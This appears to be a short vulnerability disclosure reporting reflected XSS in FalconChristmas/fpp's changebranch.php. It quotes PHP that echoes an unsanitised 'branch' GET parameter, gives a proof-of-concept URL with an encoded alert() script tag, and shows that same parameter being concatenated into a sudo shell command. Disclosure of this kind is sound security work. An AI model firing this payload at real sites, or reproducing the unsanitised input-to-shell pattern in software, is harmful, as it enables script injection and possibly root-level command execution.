Cross-site Scripting (XSS) - Reflected in FalconChristmas/fpp

Valid
Reported on May 29th 2021

✍️ Description

A reflected XSS is possible because you echo user controlled content without sanitization in https://github.com/FalconChristmas/fpp/blob/40a636c6e38442e3674db0b85fdfc5ed8a79b823/www/changebranch.php#L25

    $branch = $_GET['branch'];
    $command = "sudo /opt/fpp/scripts/git_branch " . $branch . " 2>&1";

    echo "Command: $command\n";

🕵️‍♂️ Proof of Concept

Visit : http://127.0.0.1/changebranch.php?branch=%3Cscript%3Ealert(%27zer0h%27)%3C/script%3E

💥 Impact

XSS